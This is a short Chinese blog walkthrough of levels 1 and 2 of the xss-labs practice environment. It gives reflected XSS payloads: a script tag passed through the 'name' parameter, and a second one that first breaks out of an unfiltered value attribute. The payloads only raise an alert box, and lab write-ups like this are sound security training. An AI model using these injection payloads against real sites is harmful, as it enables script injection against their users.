加载中...

xss-labs-master实战

发表于2024-08-13|更新于2024-10-03

|阅读量:

level 1

看到参数为name，构造payload：

1	http://xss-labs-master/level1.php?name=<script>alert('1')</script>

通过

level 2

先提交一个测试代码查看，构造payload：

1	<script>alert('1')</script>

查看源代码

发现下面value没有过滤

构造payload，闭合前后

1	">"<script>alert('1')</script><"

文章作者: 小chen

文章链接: http://blog.chenjichao.site/2024/08/13/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E6%BC%8F%E6%B4%9E/xss%E8%B7%A8%E7%AB%99%E6%94%BB%E5%87%BB/xss-labs-master%E5%AE%9E%E6%88%98/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自小chen妙妙屋！

相关推荐

sql手工注入

php反序列化

xss漏洞基础

评论

数据库加载中